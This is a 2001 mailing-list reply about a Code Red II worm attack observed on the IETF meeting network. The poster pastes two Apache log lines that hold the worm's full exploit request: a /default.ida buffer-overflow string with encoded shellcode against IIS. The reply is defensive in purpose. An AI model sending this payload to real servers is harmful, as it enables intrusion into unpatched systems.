--On 08/07/2001 9:21 AM -0400 Bobby Krupczak <[EMAIL PROTECTED]> wrote:
>> Well, folks, my packet suckers have shown a Code Red II attack from a
>> machine on the IETF meeting net. It's 217.33.140.38 -- if you have
>> that address, you need to disinfect and patch your machine. For the
>> rest of you, be careful...
>
> Do you always snoop on traffic at IETFs?
>
> Just curious. Dont read anything else into my question.
You don't have to snoop. Just run a webserver on port 80 on your local host
and look at the virus trying to attack your local laptop.
I run a local apache, and the logs are full of things like these:
217.33.136.83 - - [07/Aug/2001:14:32:44 +0100] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc
bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 404 271
217.33.24.50 - - [07/Aug/2001:14:36:21 +0100] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc
bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 404 271
paf
